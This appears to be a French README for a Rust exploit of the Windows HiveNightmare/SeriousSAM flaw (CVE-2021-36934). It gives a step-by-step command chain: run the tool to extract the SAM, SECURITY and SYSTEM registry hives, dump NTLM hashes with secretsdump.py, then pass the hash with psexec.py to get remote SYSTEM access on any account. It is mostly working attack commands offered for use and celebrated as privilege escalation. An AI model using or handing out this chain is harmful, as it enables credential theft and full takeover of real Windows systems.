
Exploit for CVE-2021-36934
Un exploit pour la vulnérabilité HiveNightmare/SeriousSAM qui permet de lire les ruches de registre contenant des données sensibles sans privilèges administrateur. Si cela ne ressemble pas à une escalade de privilèges, je ne sais pas ce que c'est.
Après avoir compilé l'exploit avec cargo build et récupéré le binaire, déployez-le dans votre environnement de test, ouvrez CMD et exécutez .\oxide_hive [max shadow copies], la valeur par défaut pour les copies shadow est 15. Les ruches SAM, SECURITY et SYSTEM devraient être extraites dans le répertoire de travail.
Ensuite, vous pouvez utiliser ce script avec la commande secretsdump.py -sam SAM.dump -security SECURITY.dump -system SYSTEM.dump local pour récupérer les hachages NTLM.
Puis, vous pouvez utiliser un autre script avec la commande psexec.py -hashes <hash du compte> <utilisateur>@<ip de la machine> cmd.exe pour vous connecter à distance à n'importe quel compte. Félicitations, vous venez de passer d'un utilisateur sans privilèges à NT Authority avec seulement 3 commandes.